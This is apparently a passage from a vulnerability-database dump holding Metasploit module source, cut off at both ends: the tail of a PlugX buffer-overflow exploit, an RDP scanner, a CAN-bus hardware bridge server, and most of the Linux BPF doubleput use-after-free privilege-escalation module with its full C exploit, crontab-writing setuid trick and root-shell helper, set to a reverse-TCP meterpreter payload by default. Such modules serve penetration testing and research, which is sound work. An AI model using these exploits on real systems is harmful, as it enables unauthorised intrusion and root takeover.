sock.put([key].pack('<I') + hdr[4..-1])\n if validate_response(sock.get_once || '')\n return Exploit::CheckCode::Appears\n end\n Exploit::CheckCode::Safe\n end\n\n def decode_packet(data)\n key = data[0..4].unpack('<I')\n _x, flags, _cmd, _comp_size, _uncomp_size, _xx = xorstream2(key, data[0..16]).unpack('<ISSSSI')\n\n buf = xor_stream(key, data[16..-1])\n buf = decompress(buf)\n return the_flags[flags & 0xffff], xx, buf\n end\n\n def exploit\n print_status(\"Trying target #{target.name}...\")\n\n l = 0xF008\n pad = 0x18\n a = 0x004045c4\n pktlen = l + pad + 9\n jmp = \"\\xe9\" + [-pktlen].pack('<I')\n key = rand(0xFFFFFFFF)\n hh = [key, 0, 0, pktlen, pktlen, 0].pack('<ISSSSI')\n hdr = xor_wrap(key, hh)\n pkt = [key].pack('<I') + hdr[4..-1] + payload.encoded + 'A' * (l - payload.encoded.size) + [a].pack('<I') + 'x' * pad + jmp\n\n connect\n sock.put(pkt)\n\n print_status('Waiting for response')\n validate_response(sock.get_once)\n disconnect\n\n handler\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/plugx.rb"}, {"lastseen": "2019-10-15T20:01:45", "bulletinFamily": "exploit", "description": "This module attempts to connect to the specified Remote Desktop Protocol port and determines if it speaks RDP. When available, the Credential Security Support Provider (CredSSP) protocol will be used to identify the version of Windows on which the server is running. Enabling the DETECT_NLA option will cause a second connection to be made to the server to identify if Network Level Authentication (NLA) is required.\n", "modified": "2019-08-24T03:33:18", "published": "2017-07-14T20:02:43", "id": "MSF:AUXILIARY/SCANNER/RDP/RDP_SCANNER", "href": "", "type": "metasploit", "title": "Identify endpoints speaking the Remote Desktop Protocol (RDP)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::RDP\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Identify endpoints speaking the Remote Desktop Protocol (RDP)',\n 'Description' => %q(\n This module attempts to connect to the specified Remote Desktop Protocol port\n and determines if it speaks RDP.\n\n When available, the Credential Security Support Provider (CredSSP) protocol will be used to identify the\n version of Windows on which the server is running. Enabling the DETECT_NLA option will cause a second\n connection to be made to the server to identify if Network Level Authentication (NLA) is required.\n ),\n 'Author' => 'Jon Hart <jon_hart[at]rapid7.com>',\n 'References' =>\n [\n ['URL', 'https://msdn.microsoft.com/en-us/library/cc240445.aspx']\n ],\n 'License' => MSF_LICENSE\n )\n )\n\n register_options(\n [\n Opt::RPORT(3389),\n OptBool.new('DETECT_NLA', [true, 'Detect Network Level Authentication (NLA)', true])\n ]\n )\n end\n\n def check_rdp\n begin\n rdp_connect\n is_rdp, version_info = rdp_fingerprint\n rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError\n return false, nil\n ensure\n rdp_disconnect\n end\n\n service_info = nil\n if is_rdp\n product_version = (version_info && version_info[:product_version]) ? version_info[:product_version] : 'N/A'\n info = \"Detected RDP on #{peer} (Windows version: #{product_version})\"\n\n if datastore['DETECT_NLA']\n service_info = \"Requires NLA: #{(!version_info[:product_version].nil? && requires_nla?) ? 'Yes' : 'No'}\"\n info << \" (#{service_info})\"\n end\n\n print_status(info)\n end\n\n return is_rdp, service_info\n end\n\n def requires_nla?\n begin\n rdp_connect\n is_rdp, server_selected_proto = rdp_check_protocol\n rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError\n return false\n ensure\n rdp_disconnect\n end\n\n return false unless is_rdp\n return [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include? server_selected_proto\n end\n\n def run_host(_ip)\n is_rdp = false\n begin\n rdp_connect\n is_rdp, service_info = check_rdp\n rescue Rex::ConnectionError => e\n vprint_error(\"Error while connecting and negotiating RDP: #{e}\")\n return\n ensure\n rdp_disconnect\n end\n return unless is_rdp\n\n report_service(\n host: rhost,\n port: rport,\n proto: 'tcp',\n name: 'RDP',\n info: service_info\n )\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/rdp/rdp_scanner.rb"}, {"lastseen": "2019-10-13T19:14:11", "bulletinFamily": "exploit", "description": "This module sets up a web server to bridge communications between Metasploit and physically attached hardware. Currently this module supports: automotive\n", "modified": "2017-09-14T14:28:38", "published": "2017-01-07T03:51:41", "id": "MSF:AUXILIARY/SERVER/LOCAL_HWBRIDGE", "href": "", "type": "metasploit", "title": "Hardware Bridge Server", "sourceData": "##\n#\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n#\n# TODO: SSL Support, Authentication, Listen to localhost only by default\n#\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Auxiliary::Report\n\n HWBRIDGE_API_VERSION = \"0.0.4\"\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Hardware Bridge Server',\n 'Description' => %q{\n This module sets up a web server to bridge communications between\n Metasploit and physically attached hardware.\n Currently this module supports: automotive\n },\n 'Author' => [ 'Craig Smith' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'WebServer' ]\n ],\n 'PassiveActions' =>\n [\n 'WebServer'\n ],\n 'DefaultAction' => 'WebServer'))\n\n @operational_status = 0 # 0=unk, 1=connected, 2=not connected\n @last_errors = {}\n @server_started = Time.new\n @can_interfaces = []\n @pkt_response = {} # Candump returned packets\n @packets_sent = 0\n @last_sent = nil\n end\n\n def detect_can\n @can_interfaces = []\n Socket.getifaddrs.each do |i|\n if i.name =~ /^can\\d+$/ || i.name =~ /^vcan\\d+$/ || i.name =~ /^slcan\\d+$/\n @can_interfaces << i.name\n end\n end\n end\n\n def get_status\n status = {}\n status[\"operational\"] = @operational_status\n status[\"hw_specialty\"] = {}\n status[\"hw_capabilities\"] = {}\n status[\"last_10_errors\"] = @last_errors # NOTE: no support for this yet\n status[\"api_version\"] = HWBRIDGE_API_VERSION\n status[\"fw_version\"] = \"not supported\"\n status[\"hw_version\"] = \"not supported\"\n unless @can_interfaces.empty?\n status[\"hw_specialty\"][\"automotive\"] = true\n status[\"hw_capabilities\"][\"can\"] = true\n end\n status[\"hw_capabilities\"][\"custom_methods\"] = true # To test custom methods\n status\n end\n\n def get_statistics\n stats = {}\n stats[\"uptime\"] = Time.now - @server_started\n stats[\"packet_stats\"] = @packets_sent\n stats[\"last_request\"] = @last_sent if @last_sent\n stats[\"voltage\"] = \"not supported\"\n stats\n end\n\n def get_datetime\n { \"system_datetime\" => Time.now }\n end\n\n def get_timezone\n { \"system_timezone\" => Time.now.getlocal.zone }\n end\n\n def get_ip_config\n end\n\n #\n # Stub fucntion to test custom methods\n # Defines a method \"sample_cmd\" with one argument \"data\" which is required\n #\n def get_custom_methods\n m = {}\n m[\"Methods\"] = []\n meth = { \"method_name\" => \"custom/sample_cmd\", \"method_desc\" => \"Sample HW test command\", \"args\" => [] }\n arg = { \"arg_name\" => \"data\", \"arg_type\" => \"string\", \"required\" => true }\n meth[\"args\"] << arg\n meth[\"return\"] = \"string\"\n m[\"Methods\"] << meth\n m\n end\n\n def get_auto_supported_buses\n detect_can()\n buses = []\n @can_interfaces.each do |can|\n buses << { \"bus_name\" => can }\n end\n buses\n end\n\n # Sends a raw CAN packet\n # bus = string\n # id = hex ID\n # data = string of up to 8 hex bytes\n def cansend(bus, id, data)\n result = {}\n result[\"Success\"] = false\n id = id.to_i(16).to_s(16) # Clean up the HEX\n bytes = data.scan(/../) # Break up data string into 2 char (byte) chunks\n if bytes.size > 8\n print_error(\"Data section can only contain a max of 8 bytes\")\n return result\n end\n `which cansend`\n unless $?.success?\n print_error(\"cansend from can-utils not found in path\")\n return result\n end\n @can_interfaces.each do |can|\n if can == bus\n system(\"cansend #{bus} #{id}##{bytes.join}\")\n @packets_sent += 1\n @last_sent = Time.now.to_i\n result[\"Success\"] = true if $?.success?\n end\n end\n result\n end\n\n # Converts candump output to {Packets => [{ ID=> id DATA => [] }]}\n def candump2hash(str_packets)\n hash = {}\n hash[\"Packets\"] = []\n lines = str_packets.split(/\\n/)\n lines.each do |line|\n if line =~ /\\w+\\s+(\\w+) \\[\\d\\] (.+)$/\n id = $1\n str_data = $2\n data = str_data.split\n hash[\"Packets\"] << { \"ID\" => id, \"DATA\" => data }\n end\n end\n hash\n end\n\n def candump(bus, id, timeout, maxpkts)\n $candump_sniffer = Thread.new do\n output = `candump #{bus},#{id}:FFFFFF -T #{timeout} -n #{maxpkts}`\n @pkt_response = candump2hash(output)\n Thread::exit\n end\n end\n\n # Sends an ISO-TP style CAN packet and waites for a response or a timeout\n # bus = string\n # srcid = hex id of the sent packet\n # dstid = hex id of the return packets\n # data = string of hex bytes to send\n # OPT = Options\n # timeout = optional int to timeout on lack of response\n # maxpkts = max number of packets to recieve\n # padding = append bytes to end of packet (Doesn't increase reported ISO-TP size)\n # fc = flow control, if true forces flow control packets\n def isotp_send_and_wait(bus, srcid, dstid, data, opt = {})\n result = {}\n result[\"Success\"] = false\n srcid = srcid.to_i(16).to_s(16)\n dstid = dstid.to_i(16).to_s(16)\n timeout = 2000\n maxpkts = 3\n flowcontrol = nil\n padding = nil\n timeout = opt['TIMEOUT'] if opt.key? 'TIMEOUT'\n maxpkts = opt['MAXPKTS'] if opt.key? 'MAXPKTS'\n padding = opt['PADDING'] if opt.key? 'PADDING'\n flowcontrol = opt['FC'] if opt.key? 'FC'\n bytes = data.scan(/../)\n if bytes.size > 8\n print_error(\"Data section currently has to be less than 8 bytes\")\n return result\n else\n sz = \"%02x\" % bytes.size\n bytes = sz + bytes.join\n end\n if padding && bytes.size < 16 # 16 == 8 bytes because of ascii size\n padding = \"%02x\" % padding.to_i\n bytes += ([ padding ] * (16 - bytes.size)).join\n end\n # Should we ever require isotpsend for this?\n `which cansend`\n unless $?.success?\n print_error(\"cansend from can-utils not found in path\")\n return result\n end\n @can_interfaces.each do |can|\n if can == bus\n if flowcontrol\n candump(bus, dstid, timeout, 1)\n system(\"cansend #{bus} #{srcid}##{bytes}\")\n @packets_sent += 1\n @last_sent = Time.now.to_i\n result[\"Success\"] = true if $?.success?\n result[\"Packets\"] = []\n $candump_sniffer.join\n unless @pkt_response.empty?\n result = @pkt_response\n if result.key?(\"Packets\") && result[\"Packets\"].size > 0 && result[\"Packets\"][0].key?(\"DATA\")\n if result[\"Packets\"][0][\"DATA\"][0] == \"10\"\n system(\"cansend #{bus} #{srcid}#3000000000000000\")\n candump(bus, dstid, timeout, maxpkts)\n @packets_sent += 1\n @last_sent = Time.now.to_i\n $candump_sniffer.join\n unless @pkt_response.empty?\n if @pkt_response.key?(\"Packets\") && @pkt_response[\"Packets\"].size > 0\n result[\"Packets\"] += @pkt_response[\"Packets\"]\n end\n end\n end\n end\n end\n\n else\n candump(bus, dstid, timeout, maxpkts)\n system(\"cansend #{bus} #{srcid}##{bytes}\")\n @packets_sent += 1\n @last_sent = Time.now.to_i\n result[\"Success\"] = true if $?.success?\n result[\"Packets\"] = []\n $candump_sniffer.join\n unless @pkt_response.empty?\n result = @pkt_response\n end\n end\n end\n end\n result\n\n end\n\n #\n # This is just a sample method that should show up\n # as sample_cmd in the interface\n #\n def sample_custom_method(data)\n res = {}\n res[\"value\"] = \"Succesfully processed: #{data}\"\n res\n end\n\n def not_supported\n { \"status\" => \"not supported\" }\n end\n\n def on_request_uri(cli, request)\n if request.uri =~ /status$/i\n print_status(\"Sending status...\") if datastore['VERBOSE']\n send_response_html(cli, get_status().to_json(), { 'Content-Type' => 'application/json' })\n elsif request.uri =~ /statistics$/i\n print_status(\"Sending statistics...\") if datastore['VERBOSE']\n send_response_html(cli, get_statistics().to_json(), { 'Content-Type' => 'application/json' })\n elsif request.uri =~ /settings\\/datetime\\/get$/i\n print_status(\"Sending Datetime\") if datastore['VERBOSE']\n send_response_html(cli, get_datetime().to_json(), { 'Content-Type' => 'application/json' })\n elsif request.uri =~ /settings\\/timezone\\/get$/i\n print_status(\"Sending Timezone\") if datastore['VERBOSE']\n send_response_html(cli, get_timezone().to_json(), { 'Content-Type' => 'application/json' })\n elsif request.uri =~ /custom_methods$/i\n print_status(\"Sending custom methods\") if datastore['VERBOSE']\n send_response_html(cli, get_custom_methods().to_json(), { 'Content-Type' => 'application/json' })\n elsif request.uri =~ /custom\\/sample_cmd\\?data=(\\S+)$/\n print_status(\"Request for custom command with args #{$1}\") if datastore['VERBOSE']\n send_response_html(cli, sample_custom_method($1).to_json(), { 'Content-Type' => 'application/json' })\n elsif request.uri =~ /automotive/i\n if request.uri =~ /automotive\\/supported_buses/\n print_status(\"Sending known buses...\") if datastore['VERBOSE']\n send_response_html(cli, get_auto_supported_buses().to_json, { 'Content-Type' => 'application/json' })\n elsif request.uri =~ /automotive\\/(\\w+)\\/cansend\\?id=(\\w+)&data=(\\w+)/\n print_status(\"Request to send CAN packets for #{$1} => #{$2}##{$3}\") if datastore['VERBOSE']\n send_response_html(cli, cansend($1, $2, $3).to_json(), { 'Content-Type' => 'application/json' })\n elsif request.uri =~ /automotive\\/(\\w+)\\/isotpsend_and_wait\\?srcid=(\\w+)&dstid=(\\w+)&data=(\\w+)/\n bus = $1; srcid = $2; dstid = $3; data = $4\n print_status(\"Request to send ISO-TP packet and wait for response #{srcid}##{data} => #{dstid}\") if datastore['VERBOSE']\n opt = {}\n opt['TIMEOUT'] = $1 if request.uri =~ /&timeout=(\\d+)/\n opt['MAXPKTS'] = $1 if request.uri =~ /&maxpkts=(\\d+)/\n opt['PADDING'] = $1 if request.uri =~ /&padding=(\\d+)/\n opt['FC'] = true if request.uri =~ /&fc=true/i\n send_response_html(cli, isotp_send_and_wait(bus, srcid, dstid, data, opt).to_json(), { 'Content-Type' => 'application/json' })\n else\n send_response_html(cli, not_supported().to_json(), { 'Content-Type' => 'application/json' })\n end\n else\n send_response_html(cli, not_supported().to_json(), { 'Content-Type' => 'application/json' })\n end\n end\n\n def run\n detect_can\n @server_started = Time.now\n exploit\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/local_hwbridge.rb"}, {"lastseen": "2019-10-03T05:32:26", "bulletinFamily": "exploit", "description": "Linux kernel 4.4 < 4.5.5 extended Berkeley Packet Filter (eBPF) does not properly reference count file descriptors, resulting in a use-after-free, which can be abused to escalate privileges. The target system must be compiled with `CONFIG_BPF_SYSCALL` and must not have `kernel.unprivileged_bpf_disabled` set to 1. This module has been tested successfully on: Ubuntu 16.04 (x64) kernel 4.4.0-21-generic (default kernel); Ubuntu 16.04 (x64) kernel 4.4.0-38-generic; Ubuntu 16.04 (x64) kernel 4.4.0-42-generic; Ubuntu 16.04 (x64) kernel 4.4.0-98-generic; Ubuntu 16.04 (x64) kernel 4.4.0-140-generic.\n", "modified": "2018-12-15T05:39:50", "published": "2016-09-29T09:23:12", "id": "MSF:EXPLOIT/LINUX/LOCAL/BPF_PRIV_ESC", "href": "", "type": "metasploit", "title": "Linux BPF doubleput UAF Privilege Escalation", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Post::Linux::Kernel\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super( update_info( info,\n 'Name' => 'Linux BPF doubleput UAF Privilege Escalation',\n 'Description' => %q{\n Linux kernel 4.4 < 4.5.5 extended Berkeley Packet Filter (eBPF)\n does not properly reference count file descriptors, resulting\n in a use-after-free, which can be abused to escalate privileges.\n\n The target system must be compiled with `CONFIG_BPF_SYSCALL`\n and must not have `kernel.unprivileged_bpf_disabled` set to 1.\n\n This module has been tested successfully on:\n\n Ubuntu 16.04 (x64) kernel 4.4.0-21-generic (default kernel);\n Ubuntu 16.04 (x64) kernel 4.4.0-38-generic;\n Ubuntu 16.04 (x64) kernel 4.4.0-42-generic;\n Ubuntu 16.04 (x64) kernel 4.4.0-98-generic;\n Ubuntu 16.04 (x64) kernel 4.4.0-140-generic.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'jannh@google.com', # discovery and exploit\n 'h00die <mike@shorebreaksecurity.com>' # metasploit module\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'DisclosureDate' => '2016-05-04',\n 'Privileged' => true,\n 'References' =>\n [\n ['BID', '90309'],\n ['CVE', '2016-4557'],\n ['EDB', '39772'],\n ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=808'],\n ['URL', 'https://usn.ubuntu.com/2965-1/'],\n ['URL', 'https://launchpad.net/bugs/1578705'],\n ['URL', 'http://changelogs.ubuntu.com/changelogs/pool/main/l/linux/linux_4.4.0-22.39/changelog'],\n ['URL', 'https://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-4557.html'],\n ['URL', 'https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7']\n ],\n 'Targets' =>\n [\n [ 'Linux x86', { 'Arch' => ARCH_X86 } ],\n [ 'Linux x64', { 'Arch' => ARCH_X64 } ]\n ],\n 'DefaultOptions' =>\n {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',\n 'PrependFork' => true,\n 'WfsDelay' => 60 # we can chew up a lot of CPU for this, so we want to give time for payload to come through\n },\n 'Notes' =>\n {\n 'AKA' =>\n [\n 'double-fdput',\n 'doubleput.c'\n ]\n },\n 'DefaultTarget' => 1))\n register_options [\n OptEnum.new('COMPILE', [true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']]),\n OptInt.new('MAXWAIT', [true, 'Max time to wait for decrementation in seconds', 120])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']),\n ]\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def exploit_data(file)\n ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-4557', file)\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def live_compile?\n return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')\n\n return true if has_prereqs?\n\n unless datastore['COMPILE'].eql? 'Auto'\n fail_with Failure::BadConfig, 'Prerequisites are not installed. Compiling will fail.'\n end\n end\n\n def has_prereqs?\n def check_libfuse_dev?\n lib = cmd_exec('dpkg --get-selections | grep libfuse-dev')\n if lib.include?('install')\n vprint_good('libfuse-dev is installed')\n return true\n else\n print_error('libfuse-dev is not installed. Compiling will fail.')\n return false\n end\n end\n\n def check_gcc?\n if has_gcc?\n vprint_good('gcc is installed')\n return true\n else\n print_error('gcc is not installed. Compiling will fail.')\n return false\n end\n end\n\n def check_pkgconfig?\n lib = cmd_exec('dpkg --get-selections | grep ^pkg-config')\n if lib.include?('install')\n vprint_good('pkg-config is installed')\n return true\n else\n print_error('pkg-config is not installed. Exploitation will fail.')\n return false\n end\n end\n\n return check_libfuse_dev? && check_gcc? && check_pkgconfig?\n end\n\n def upload_and_compile(path, data, gcc_args='')\n upload \"#{path}.c\", data\n\n gcc_cmd = \"gcc -o #{path} #{path}.c\"\n if session.type.eql? 'shell'\n gcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\"\n end\n\n unless gcc_args.to_s.blank?\n gcc_cmd << \" #{gcc_args}\"\n end\n\n output = cmd_exec gcc_cmd\n\n unless output.blank?\n print_error output\n fail_with Failure::Unknown, \"#{path}.c failed to compile. Set COMPILE False to upload a pre-compiled executable.\"\n end\n\n register_file_for_cleanup path\n chmod path\n end\n\n def check\n release = kernel_release\n if Gem::Version.new(release.split('-').first) < Gem::Version.new('4.4') ||\n Gem::Version.new(release.split('-').first) >= Gem::Version.new('4.5.5')\n vprint_error \"Kernel version #{release} is not vulnerable\"\n return CheckCode::Safe\n end\n vprint_good \"Kernel version #{release} appears to be vulnerable\"\n\n lib = cmd_exec('dpkg --get-selections | grep ^fuse').to_s\n unless lib.include?('install')\n print_error('fuse package is not installed. Exploitation will fail.')\n return CheckCode::Safe\n end\n vprint_good('fuse package is installed')\n\n fuse_mount = \"#{base_dir}/fuse_mount\"\n if directory? fuse_mount\n vprint_error(\"#{fuse_mount} should be unmounted and deleted. Exploitation will fail.\")\n return CheckCode::Safe\n end\n vprint_good(\"#{fuse_mount} doesn't exist\")\n\n config = kernel_config\n\n if config.nil?\n vprint_error 'Could not retrieve kernel config'\n return CheckCode::Unknown\n end\n\n unless config.include? 'CONFIG_BPF_SYSCALL=y'\n vprint_error 'Kernel config does not include CONFIG_BPF_SYSCALL'\n return CheckCode::Safe\n end\n vprint_good 'Kernel config has CONFIG_BPF_SYSCALL enabled'\n\n if unprivileged_bpf_disabled?\n vprint_error 'Unprivileged BPF loading is not permitted'\n return CheckCode::Safe\n end\n vprint_good 'Unprivileged BPF loading is permitted'\n\n CheckCode::Appears\n end\n\n def exploit\n unless check == CheckCode::Appears\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n if nosuid? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is mounted nosuid\"\n end\n\n doubleput = %q{\n #define _GNU_SOURCE\n #include <stdbool.h>\n #include <errno.h>\n #include <err.h>\n #include <unistd.h>\n #include <fcntl.h>\n #include <sched.h>\n #include <signal.h>\n #include <stdlib.h>\n #include <stdio.h>\n #include <string.h>\n #include <sys/types.h>\n #include <sys/stat.h>\n #include <sys/syscall.h>\n #include <sys/prctl.h>\n #include <sys/uio.h>\n #include <sys/mman.h>\n #include <sys/wait.h>\n #include <linux/bpf.h>\n #include <linux/kcmp.h>\n\n #ifndef __NR_bpf\n # if defined(__i386__)\n # define __NR_bpf 357\n # elif defined(__x86_64__)\n # define __NR_bpf 321\n # elif defined(__aarch64__)\n # define __NR_bpf 280\n # else\n # error\n # endif\n #endif\n\n int uaf_fd;\n\n int task_b(void *p) {\n /* step 2: start writev with slow IOV, raising the refcount to 2 */\n char *cwd = get_current_dir_name();\n char data[2048];\n sprintf(data, \"* * * * * root /bin/chown root:root '%s'/suidhelper; /bin/chmod 06755 '%s'/suidhelper\\n#\", cwd, cwd);\n struct iovec iov = { .iov_base = data, .iov_len = strlen(data) };\n if (system(\"fusermount -u /home/user/ebpf_mapfd_doubleput/fuse_mount 2>/dev/null; mkdir -p fuse_mount && ./hello ./fuse_mount\"))\n errx(1, \"system() failed\");\n int fuse_fd = open(\"fuse_mount/hello\", O_RDWR);\n if (fuse_fd == -1)\n err(1, \"unable to open FUSE fd\");\n if (write(fuse_fd, &iov, sizeof(iov)) != sizeof(iov))\n errx(1, \"unable to write to FUSE fd\");\n struct iovec *iov_ = mmap(NULL, sizeof(iov), PROT_READ, MAP_SHARED, fuse_fd, 0);\n if (iov_ == MAP_FAILED)\n err(1, \"unable to mmap FUSE fd\");\n fputs(\"starting writev\\n\", stderr);\n ssize_t writev_res = writev(uaf_fd, iov_, 1);\n /* ... and starting inside the previous line, also step 6: continue writev with slow IOV */\n if (writev_res == -1)\n err(1, \"writev failed\");\n if (writev_res != strlen(data))\n errx(1, \"writev returned %d\", (int)writev_res);\n fputs(\"writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.\\n\", stderr);\n while (1) sleep(1); /* whatever, just don't crash */\n }\n\n void make_setuid(void) {\n /* step 1: open writable UAF fd */\n uaf_fd = open(\"/dev/null\", O_WRONLY|O_CLOEXEC);\n if (uaf_fd == -1)\n err(1, \"unable to open UAF fd\");\n /* refcount is now 1 */\n\n char child_stack[20000];\n int child = clone(task_b, child_stack + sizeof(child_stack), CLONE_FILES | SIGCHLD, NULL);\n if (child == -1)\n err(1, \"clone\");\n sleep(3);\n /* refcount is now 2 */\n\n /* step 2+3: use BPF to remove two references */\n for (int i=0; i<2; i++) {\n struct bpf_insn insns[2] = {\n {\n .code = BPF_LD | BPF_IMM | BPF_DW,\n .src_reg = BPF_PSEUDO_MAP_FD,\n .imm = uaf_fd\n },\n {\n }\n };\n union bpf_attr attr = {\n .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,\n .insn_cnt = 2,\n .insns = (__aligned_u64) insns,\n .license = (__aligned_u64)\"\"\n };\n if (syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr)) != -1)\n errx(1, \"expected BPF_PROG_LOAD to fail, but it didn't\");\n if (errno != EINVAL)\n err(1, \"expected BPF_PROG_LOAD to fail with -EINVAL, got different error\");\n }\n /* refcount is now 0, the file is freed soon-ish */\n\n /* step 5: open a bunch of readonly file descriptors to the target file until we hit the same pointer */\n int status;\n int hostnamefds[1000];\n int used_fds = 0;\n bool up = true;\n while (1) {\n if (waitpid(child, &status, WNOHANG) == child)\n errx(1, \"child quit before we got a good file*\");\n if (up) {\n hostnamefds[used_fds] = open(\"/etc/crontab\", O_RDONLY);\n if (hostnamefds[used_fds] == -1)\n err(1, \"open target file\");\n if (syscall(__NR_kcmp, getpid(), getpid(), KCMP_FILE, uaf_fd, hostnamefds[used_fds]) == 0) break;\n used_fds++;\n if (used_fds == 1000) up = false;\n } else {\n close(hostnamefds[--used_fds]);\n if (used_fds == 0) up = true;\n }\n }\n fputs(\"woohoo, got pointer reuse\\n\", stderr);\n while (1) sleep(1); /* whatever, just don't crash */\n }\n\n int main(void) {\n pid_t child = fork();\n if (child == -1)\n err(1, \"fork\");\n if (child == 0)\n make_setuid();\n struct stat helperstat;\n while (1) {\n if (stat(\"suidhelper\", &helperstat))\n err(1, \"stat suidhelper\");\n if (helperstat.st_mode & S_ISUID)\n break;\n sleep(1);\n }\n fputs(\"suid file detected, launching rootshell...\\n\", stderr);\n execl(\"./suidhelper\", \"suidhelper\", NULL);\n err(1, \"execl suidhelper\");\n }\n }\n\n suid_helper = %q{\n #include <unistd.h>\n #include <err.h>\n #include <stdio.h>\n #include <sys/types.h>\n\n int main(void) {\n if (setuid(0) || setgid(0))\n err(1, \"setuid/setgid\");\n fputs(\"we have root privs now...\\n\", stderr);\n execl(\"/bin/bash\", \"bash\", NULL);\n err(1, \"execl\");\n }\n\n }\n\n hello = %q{\n /*\n FUSE: Filesystem in Userspace\n Copyright (C) 2001-2007 Miklos Szeredi <miklos@szeredi.hu>\n heavily modified by Jann Horn <jannh@google.com>\n\n This program can be distributed under the terms of the GNU GPL.\n See the file COPYING.\n\n gcc -Wall hello.c `pkg-config fuse --cflags --libs` -o hello\n */\n\n #define FUSE_USE_VERSION 26\n\n #include <fuse.h>\n #include <stdio.h>\n #include <string.h>\n #include <errno.h>\n #include <fcntl.h>\n #include <unistd.h>\n #include <err.h>\n #include <sys/uio.h>\n\n static const char *hello_path = \"/hello\";\n\n static char data_state[sizeof(struct iovec)];\n\n static int hello_getattr(const char *path, struct stat *stbuf)\n {\n int res = 0;\n memset(stbuf, 0, sizeof(struct stat));\n if (strcmp(path, \"/\") == 0) {\n stbuf->st_mode = S_IFDIR | 0755;\n stbuf->st_nlink = 2;\n } else if (strcmp(path, hello_path) == 0) {\n stbuf->st_mode = S_IFREG | 0666;\n stbuf->st_nlink = 1;\n stbuf->st_size = sizeof(data_state);\n stbuf->st_blocks = 0;\n } else\n res = -ENOENT;\n return res;\n }\n\n static int hello_readdir(const char *path, void *buf, fuse_fill_dir_t filler, off_t offset, struct fuse_file_info *fi) {\n filler(buf, \".\", NULL, 0);\n filler(buf, \"..\", NULL, 0);\n filler(buf, hello_path + 1, NULL, 0);\n return 0;\n }\n\n static int hello_open(const char *path, struct fuse_file_info *fi) {\n return 0;\n }\n\n static int hello_read(const char *path, char *buf, size_t size, off_t offset, struct fuse_file_info *fi) {\n sleep(10);\n size_t len = sizeof(data_state);\n if (offset < len) {\n if (offset + size > len)\n size = len - offset;\n memcpy(buf, data_state + offset, size);\n } else\n size = 0;\n return size;\n }\n\n static int hello_write(const char *path, const char *buf, size_t size, off_t offset, struct fuse_file_info *fi) {\n if (offset != 0)\n errx(1, \"got write with nonzero offset\");\n if (size != sizeof(data_state))\n errx(1, \"got write with size %d\", (int)size);\n memcpy(data_state + offset, buf, size);\n return size;\n }\n\n static struct fuse_operations hello_oper = {\n .getattr\t= hello_getattr,\n .readdir\t= hello_readdir,\n .open\t\t= hello_open,\n .read\t\t= hello_read,\n .write\t\t= hello_write,\n };\n\n int main(int argc, char *argv[]) {\n return fuse_main(argc, argv, &hello_oper, NULL);\n }\n }\n\n @hello_name = 'hello'\n hello_path = \"#{base_dir}/#{@hello_name}\"\n @doubleput_name = 'doubleput'\n doubleput_path = 